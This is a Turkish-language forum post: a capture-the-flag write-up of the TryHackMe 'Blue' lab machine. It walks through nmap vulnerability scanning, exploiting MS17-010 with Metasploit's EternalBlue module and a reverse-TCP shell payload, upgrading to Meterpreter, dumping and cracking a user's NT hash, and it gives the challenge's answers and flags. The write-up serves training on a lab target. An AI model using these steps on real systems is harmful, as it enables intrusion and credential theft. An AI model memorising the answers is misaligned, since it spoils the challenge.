THM Blue CTF WriteUp

AdaletinKILICI

Katılımcı Üye
29 Eyl 2019
311
120
127.0.0.1
Selamın aleyküm arkadaşlar ben AnkaRedTeam dan AdaletinKILICI. Bu konumuzda sizlerle beraber tryhackme(THM) üzerinde bulunan Blue makinesini çözeceğiz. Hemem başlayalım.

Bilgi Toplama

Her zaman olduğu gibi ilk aşamamız bilgi toplama. Bunun için ilk olarak nmap programı ile açık portları tespit ediyoruz.

Kod:
nmap -A -T4 makine_ip

komutu ile açık portları tespit edebiliriz. Aynı şekilde portlarda herhangi bir zafiyet olup olmadığını da

Kod:
-script vuln

parametresini kullanarak öğrenebiliriz. Yani komutumuzun tam hali aşağıdaki gibi oluyor:

Kod:
nmap -A -T4 -script vuln makine_ip

İlk sorumuzda 1000'in altında kaç portun açık olduğu soruluyor. Tarama sorucumuza göre 1000'in altında 3 adet port açık.
Yani ilk sorumuzun cevabı: 3

İkinci sorumuza geldiğimiz zaman bizden makinedeki açığın ne olduğunu istemiş. Nmap üzerinde kullandığımız -scriptt vuln parametresi ile bize bu açık çıktıda verildi.

idgox.png


Resimde de gördüğünüz gibi smb üzerinde ms17-010 açığı mevcut.

Yani ikinci sorumuzun cevabı: ms17-010

Sisteme Sızma

Açığımızı bulduktan sonra ihtiyacımız olan şey bu açığı exploit etmek. Bunun için çeşitli exploitler kullanılabilir. Biz bu yazımızda thm platformunda da söylendiği gibi m e t asploit aracını kullanacağız. m e t asploit'i çalıştırıp;

Kod:
search ms17-010

diye bir arama yapınca karşımıza bazı exploitler çıkıyor.

idN9V.png


Bizim burada kullanacağımız exploit ikinci sırada olan "exploit/windows/smb/ms17_010_eternalblue" exploiti.

Yani sonraki sorumuzun cevabı: exploit/windows/smb/ms17_010_eternalblue

Şimdi ise "use exploit/windows/smb/ms17_010_eternalblue" komutunu kullanarak exploitimize geçiş yapıyoruz. "options" komutu aracılığı ile bizden istenen bilgileri inceliyoruz. Zaten bu soruda da neyin gerekli olduğu sorulmuş.

idVXP.png


İnceleyecek olursak "Rhost" gerekli bir alan fakat doldurulmamış.
Yani bu sorumuzun cevabı: RHOSTS

"set rhost makine_ip" yazarak makine ip'sini exploite ekliyoruz. Şimdi ise bu exploitimize bir payload eklemeliyiz. Kullanacağımız payload: windows/x64/shell/reverse_tcp.

Kod:
 set payload windows/x64/shell/reverse_tcp

komutu ile payloadımızı tanımlıyoruz. Payloadımızın da bizden istediği bir ayar var. LHOST. Bu alana ise thm'nin bize verdiği ip adresini yazıyoruz. Sonuç olarak resimdeki gibi olmalı.

idu0g.png


Ve artık "exploit" diyerek çalıştırıp sisteme sızabiliriz:)

id8uW.png


Shell to Meterpreter

Sızma işlemimizi başarıyla yaptık. Yetkimize baktığımız zaman(whoami) Admin olduğumuzu yani tam yetkili olduğumuzu görüyoruz. Shell üzerinden çok birşey yapamayacağımız için meterpreter oturumuna geçmemiz gerekiyor. Burada devreye post exploitler giriyor. CTRL+Z yaparak üzerinde olduğumuz oturumu arkaplana atıp "search shell_to_meterpreter" aramasını yapıyoruz. Bu post exploit bizim oturumumuzu meterpreter oturumuna çevirmemize yarayacak.
Şimdiki soruda bu exploitin yolunu istemiş.

Yani bu sorunun cevabı: post/multi/manage/shell_to_meterpreter

Kod:
use post/multi/manage/shell_to_meterpreter

Yazarak bu exploite geçiyoruz. İstediği ayarlara baktığımız zaman ise "LHOST ve SESSION" ayarlarını görüyoruz. LHOST'a thm ipmizi, SESSION'a ise oturum idmizi yazıyoruz. Oturum idsini öğrenmek için "sessions" komutunu çalıştırabilirsiniz.

Şimdiki sorumuzun cevabı: SESSION

Exploitimizi çalıştırdığımız zaman aşağıda da gördüğünüz gibi oturumumuz geldi:)

idjhF.png


Şuanda system userindeyiz ama exploitimizi de almamız lazım. Bunun için "ps" komutunu çalıştırıp aktif uygulamalara bakıyoruz. Bunlardan sistem kullanıcısının kullandıklarından herhangi birini "migrate PID" ile ele geçiriyoruz. Hata verirse diğerini deneyebilirsiniz.

Cracking

Bu kısımda ilk olarak bizden sistemdeki diğer user adını istemiş. Aynı şekilde onun şifresini. Meterpreter oturumunda iken "hashdump" komutunu çalıştırarak user'lara ve şifrelerinin hashlı haline ulaşabilirsiniz. Çalıştırdığımız zaman;

idBCZ.png


Görüntüsü ile karşılaşıyoruz.
Bu bölümün ilk sorusunun cevabı: Jon

Şimdi ise bizden Jon kullanıcısının şifresini kırmamızı istemiş. Bunun için john aracını kullanabiliriz. Çıkan bütün hash'ı kopyalayıp bir dosyaya kaydediyoruz.
"Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" şeklinde olmalı. Sonra ise john aracı ile bu şifreyi kırıyoruz.

Kod:
john hashdosyasi.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

Komutu aracılığı ile kırabilirsiniz. Buradaki NT windows işletim sistemini temsil etmektedir.

Eğer bu şekilde kıramadıysanız ikinoktalar ile ayrılmış 4. kısmı kopyalayıp online hash crackerler aracılığı ile de kırabilirsiniz.
Bu sorumuzun cevabı: alqfna22

Flagları Bulalım

Bu kısımda ise gizlenen flagları bulacağız. Bunun için yapmamız gereken sistemde gezinmek:) İlk flagımızı C diskinin ana dizininde buluyoruz.

iddDo.png


İlk sorunun cevabı: flag{access_the_machine}

İkinci flag için ipucuna baktığımızda windows parolalarının bulunduğu bir yerde olduğunu söylüyor. Biraz araştırmadan sonra o konumun Windows/System32/config olduğunu buluyoruz. Gidip baktığımızda flag2 orada:)

idkFt.png


İkinci sorunun cevabı: flag{sam_database_elevated_access}

Son flag ipucunda ise sadece yetkisinin olduğu kişinin girebileceği bir yerde saklandığı yazıyor. Jon userinin dizinlerine bakarken C:\Users\Jon\********s dizininde flag3 ü buluyoruz.

id5rQ.png


Yani son sorumuzun cevabı: flag{admin_********s_can_be_valuable}

Kapanış

Bu yazımızda sizlerle beraber tryhackme sitesinde bulunan blue makinesini çözdük. Bir sonraki yazımızda görüşmek üzere hoşça kalın...
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.